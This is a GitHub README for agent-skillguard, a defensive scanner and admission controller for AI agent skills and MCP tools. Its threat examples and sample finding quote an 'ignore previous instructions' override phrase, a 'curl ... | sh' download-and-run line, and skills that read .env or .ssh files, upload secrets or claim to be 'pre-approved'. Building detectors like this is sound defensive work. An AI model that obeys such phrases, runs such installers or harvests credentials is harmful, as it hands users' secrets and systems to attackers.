Agent SkillGuard

Policy-as-code admission controller for AI agent skills and MCP tools.

Agent skills are executable supply chain. agent-skillguard creates portable approval evidence: SkillBOM, lockfiles, provenance checks, semantic intent review, SkillSet Attack Graphs, and Skill Passports that show what was reviewed and why it was allowed or blocked.

Agent Trust Suite

flowchart LR
  A["agent-endpoint-doctor"] --> F["agent-trust-center"]
  B["nim-doctor"] --> F
  C["agent-cognicheck"] --> F
  D["agent-skillguard"] --> F
  E["agentops-watchtower"] --> F
  F --> G["one trust report"]
  F --> H["CI gate"]

SkillGuard contributes skill supply-chain evidence to Agent Trust Center through npx agent-skillguard evidence.

Quickstart

# 1. Run the bundled supply-chain demo
npx agent-skillguard demo

# 2. Detect unsafe skill combinations
npx agent-skillguard graph ./skills

# 3. Create an enterprise approval record
npx agent-skillguard passport ./skills/code-reviewer \
  --source https://github.com/org/repo/tree/main/skills/code-reviewer \
  --commit <sha> \
  --publisher org \
  --pack

Power-user commands remain available:

npx agent-skillguard demo
npx agent-skillguard graph ./skills
npx agent-skillguard intent ./skills
npx agent-skillguard baseline ./skills --reason "initial reviewed risk"
npx agent-skillguard triage ./skills --baseline .skillguard/baseline.json --fail-on high
npx agent-skillguard trust ./skills/code-reviewer --source https://github.com/org/repo/tree/main/skills/code-reviewer --commit <sha>
npx agent-skillguard contract ./skills
npx agent-skillguard admit ./skills
npx agent-skillguard review-update ./approved/skill ./candidate/skill
npx agent-skillguard scan ./skills
npx agent-skillguard pack ./skills/code-reviewer
npx agent-skillguard verify ./code-reviewer.skill.tgz

Why This Exists

Skills for Codex, Claude Code, Cursor, OpenCode, MCP workflows, and internal agents often look like Markdown prompts, but they can include scripts, install hooks, tool descriptors, hidden instructions, and broad permissions. That makes them a new package-management problem.

SkillGuard finds unsafe skill combinations, not just unsafe individual skills.

agent-skillguard is not another skill list and not another agent framework. It is a local-first admission controller for agent skills:

Builds a SkillSet Attack Graph that detects cross-skill composition risk.
Creates a shareable Skill Passport that combines provenance, scan, semantic intent review, contract, admission, lock, and optional bundle evidence.
Runs a Semantic Intent Firewall for payload-less natural-language risks such as compliance-framed secret collection, approval bypass, and skill selection hijacking.
Creates auditable risk baselines so teams can accept reviewed existing risk and fail CI only on new or expired risk.
Blocks unpinned, mutable, or unapproved skill sources with a provenance firewall.
Enforces least-privilege capability contracts from SKILL.md declarations.
Finds hidden prompt injection and policy override text in Markdown, YAML, HTML comments, and code blocks.
Flags secret exfiltration, credential harvesting, persistence, broad deletes, and download-execute installer chains.
Detects risky bundle structure such as symlinks, hidden files, binaries, oversized payloads, and path traversal.
Makes ALLOW, REVIEW, or BLOCK admission decisions from policy-as-code.
Reviews candidate skill updates for capability drift, new findings, changed instruction surfaces, file drift, and risk-score jumps.
Builds a SkillBOM, an SBOM-like inventory for agent skills.
Writes skillguard.lock.json with reproducible file hashes and declared capabilities.
Packs deterministic .skill.tgz bundles with embedded locks.
Emits Markdown, HTML, JSON, and SARIF for local review and GitHub code scanning.

AgentSec Trilogy

Use SkillGuard as the admission-control layer in a broader local-first AgentSec pipeline:

agent-cognicheck      test/red-team MCP tools and skills before approval
agent-skillguard      approve, lock, passport, baseline, and package skills
agentops-watchtower   monitor runtime behavior and preserve incident evidence

One-Command Demo

npx agent-skillguard demo

The demo scans bundled safe and malicious fixtures and writes:

.skillguard/reports/skillguard-report.json
.skillguard/reports/skillguard-report.md
.skillguard/reports/skillguard-report.html
.skillguard/reports/skillguard-report.sarif
.skillguard/reports/skillguard-intent.json
.skillguard/reports/skillguard-intent.md
.skillguard/reports/skillguard-attack-graph.json
.skillguard/reports/skillguard-attack-graph.md
.skillguard/reports/skillguard-attack-graph.html

Report Preview

Area	What You See
Summary	skills scanned, files inventoried, finding count, risk score
SkillBOM	skill names, roots, files, scripts, capabilities
Findings	severity, category, target, evidence, recommendation
SARIF	GitHub code scanning compatible findings

Example critical finding:

[CRITICAL] Prompt-injection instruction detected
Target: SKILL.md
Evidence: ignore previous instructions and developer messages
Recommendation: remove the instruction and require host policy compliance

Commands

agent-skillguard init
agent-skillguard demo
agent-skillguard passport <skill-dir> --source <uri> [--commit <sha>] [--publisher <name>] [--pack]
agent-skillguard verify-passport <passport-json> [--skill-dir <path>] [--bundle <path>]
agent-skillguard graph <path> [--baseline <path>] [--fail-on high]
agent-skillguard intent <path> [--fail-on high]
agent-skillguard baseline <path> --reason <text> [--expires <date>]
agent-skillguard triage <path> --baseline <path> [--fail-on high]
agent-skillguard policy
agent-skillguard trust <skill-dir> --source <uri> [--commit <sha>] [--publisher <name>] [--write]
agent-skillguard contract <path>
agent-skillguard admit <path> [--require-lock] [--sarif]
agent-skillguard review-update <approved-skill> <candidate-skill>
agent-skillguard scan <path> [--sarif] [--fail-on critical]
agent-skillguard lock <skill-dir>
agent-skillguard pack <skill-dir>
agent-skillguard verify <bundle-or-dir>
agent-skillguard report [--sarif]
agent-skillguard doctor

Threat Examples

A skill hides ignore previous instructions inside an HTML comment.
An installer runs curl https://example.com/install.sh | sh.
A skill tells the agent to read .env, .ssh, or token files and upload secrets.
A bundled MCP descriptor grants repository mutation or destructive tool access.
A package manifest uses install hooks to run code during setup.
A skill changes after review, but the lockfile catches the hash drift.
A skill source points to a mutable GitHub branch instead of an immutable commit.
A skill has no malware payload but instructs the agent to collect credentials as "compliance evidence" and treat the action as pre-approved.

Skill Passport

A Skill Passport is the enterprise approval record for an AI agent skill:

agent-skillguard passport ./skills/code-reviewer \
  --source https://github.com/org/repo/tree/main/skills/code-reviewer \
  --commit 0123456789abcdef0123456789abcdef01234567 \
  --publisher org \
  --pack

It runs provenance, scan, semantic intent review, capability contract, admission, lock generation, and optional deterministic packaging in one command.

Passport outputs:

.skillguard/passports/<skill-name>/passport.json
.skillguard/passports/<skill-name>/passport.md
.skillguard/passports/<skill-name>/passport.html
.skillguard/passports/<skill-name>/skillguard.lock.json
.skillguard/passports/<skill-name>/<skill-name>.skill.tgz

Use the lower-level commands below when you need to debug one control layer directly.

Verify a passport later:

agent-skillguard verify-passport .skillguard/passports/code-reviewer/passport.json \
  --skill-dir ./skills/code-reviewer \
  --bundle .skillguard/passports/code-reviewer/code-reviewer.skill.tgz

Verification checks passport schema, lock digest, optional current skill digest, optional bundle digest, and embedded decision consistency.

SkillSet Attack Graph

Individual skills can look acceptable while a set of installed skills creates a dangerous chain.

agent-skillguard graph ./skills --fail-on high

flowchart LR
  A["env-reader skill"] --> B["summarizer skill"]
  B --> C["webhook-publisher skill"]
  C --> D["Critical: secret source to external sink"]

Graph review flags cross-skill paths such as:

secret access to network publishing
filesystem read to external sink
repository read to git write
browser automation to external sink
approval bypass or selection hijack amplifying high-power tools
MCP tool mutation combined with broad capability chains

It writes:

.skillguard/reports/skillguard-attack-graph.json
.skillguard/reports/skillguard-attack-graph.md
.skillguard/reports/skillguard-attack-graph.html

See docs/skillset-attack-graph.md.

Semantic Intent Firewall

Modern malicious skills do not always need obvious scripts or ignore previous instructions strings. A skill can look like ordinary Markdown while pushing the agent toward unsafe behavior at runtime.

agent-skillguard intent ./skills --fail-on high

Intent review flags natural-language behavior risks:

compliance or audit language used to justify collecting secrets
approval bypass such as "pre-approved" or "do not ask"
broad "use this skill for every task" selection hijacking
claims that the skill overrides system, developer, user, or policy instructions
remote instruction loading from URLs
persistent memory, profile, startup, or background behavior

It writes:

.skillguard/reports/skillguard-intent.json
.skillguard/reports/skillguard-intent.md

Real-World Validation

SkillGuard has been smoke-tested against 186 public SKILL.md files across official, community, and adversarial skill repositories. See docs/real-world-validation.md for commands, repository commits, results, and validation-driven rule tuning.

Risk Baselines

Adopting a scanner in a mature repo usually starts with existing review-worthy risk. Baselines let teams accept the current state with a reason, then fail only when new or expired risk appears.

agent-skillguard baseline ./skills --reason "reviewed current vendored skills" --expires 2026-12-31
agent-skillguard triage ./skills --baseline .skillguard/baseline.json --fail-on high

This writes:

.skillguard/baseline.json
.skillguard/reports/skillguard-baseline.md
.skillguard/reports/skillguard-triage.json
.skillguard/reports/skillguard-triage.md

See docs/risk-baselines.md.

Provenance Firewall

A skill can scan clean and still be unsafe to trust if it came from a mutable branch, unknown host, or unapproved publisher. SkillGuard records and evaluates source provenance:

agent-skillguard trust ./skills/code-reviewer \
  --source https://github.com/org/repo/tree/main/skills/code-reviewer \
  --commit 0123456789abcdef0123456789abcdef01234567 \
  --publisher org \
  --write

Trust review writes:

.skillguard/reports/skillguard-trust.json
.skillguard/reports/skillguard-trust.md

With --write, it also records skillguard.provenance.json beside the skill. This gives teams an audit record of what source, publisher, commit, and skill digest were approved.

Capability Contracts

Skills should declare their power before they run. SkillGuard compares declared capabilities in SKILL.md against observed behavior:

agent-skillguard contract ./skills

It blocks undeclared high-risk behavior such as shell execution, network access, filesystem writes, package installs, secret access, git writes, and MCP tool mutation.

Contract review writes:

.skillguard/reports/skillguard-contract.json
.skillguard/reports/skillguard-contract.md

Admission Control

The breakthrough path is governance, not just scanning. Enterprises need to answer one question before a skill enters a project:

Is this skill allowed to run here?

Create a policy:

agent-skillguard policy

Then gate skills:

agent-skillguard admit ./skills --require-lock --sarif

Admission writes:

.skillguard/reports/skillguard-admission.json
.skillguard/reports/skillguard-admission.md

Default policy blocks critical findings, secret access, MCP tool mutation, and unapproved install-script behavior. Teams can tighten this to require clean scans and lockfiles for every approved skill.

Update Firewall

Most supply-chain compromises arrive as updates, not first installs. SkillGuard can compare an approved skill with a candidate replacement:

agent-skillguard review-update ./approved/code-reviewer ./incoming/code-reviewer

It blocks risky drift when the candidate adds dangerous capabilities, introduces new high/critical findings, changes the main SKILL.md instruction surface, or jumps materially in risk score.

Update review writes:

.skillguard/reports/skillguard-update-review.json
.skillguard/reports/skillguard-update-review.md

Compared With Other Tools

Tool Type	What It Does	SkillGuard Difference
Skill lists	Curate useful prompts and workflows	Verifies skill safety before install or publish
Agent frameworks	Run agents and tools	Does not run agents; audits skill supply chain
MCP scanners	Inspect MCP tool descriptors	Scans skills, scripts, manifests, bundles, locks, and SARIF
OpenSSF Scorecard	Scores open-source project security posture	Skill-specific admission decisions and SkillBOMs
SLSA/provenance tools	Prove build artifact origin	Skill-specific source provenance, digest, and trust policy
Permission manifests	Describe expected permissions	Compares declared permissions to inferred skill behavior
Watchtower	Runtime AgentOps and MCP attack-path analysis	SkillGuard handles pre-install and pre-publish skill safety

CI Gate

Use Skill Passport in pull requests to retain an approval artifact:

name: skillguard
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npx agent-skillguard passport ./skills/code-reviewer --source https://github.com/org/repo/tree/main/skills/code-reviewer --commit ${{ github.sha }} --publisher org

Local Development

npm install
npm run typecheck
npm test
npm run lint
npm run build
node dist/cli.js demo

License

MIT

Name		Name	Last commit message	Last commit date
Latest commit History 14 Commits
.github/workflows		.github/workflows
docs		docs
examples		examples
src		src
tests		tests
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
LICENSE		LICENSE
README.md		README.md
SECURITY.md		SECURITY.md
action.yml		action.yml
eslint.config.js		eslint.config.js
package-lock.json		package-lock.json
package.json		package.json
tsconfig.json		tsconfig.json
vitest.config.ts		vitest.config.ts

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Agent SkillGuard

Agent Trust Suite

Quickstart

Why This Exists

AgentSec Trilogy

One-Command Demo

Report Preview

Commands

Threat Examples

Skill Passport

SkillSet Attack Graph

Semantic Intent Firewall

Real-World Validation

Risk Baselines

Provenance Firewall

Capability Contracts

Admission Control

Update Firewall

Compared With Other Tools

CI Gate

Local Development

License

About

Uh oh!

Releases 1

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

Agent SkillGuard

Agent Trust Suite

Quickstart

Why This Exists

AgentSec Trilogy

One-Command Demo

Report Preview

Commands

Threat Examples

Skill Passport

SkillSet Attack Graph

Semantic Intent Firewall

Real-World Validation

Risk Baselines

Provenance Firewall

Capability Contracts

Admission Control

Update Firewall

Compared With Other Tools

CI Gate

Local Development

License

About

Topics

Resources

License

Security policy

Uh oh!

Stars

Watchers

Forks

Releases 1

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages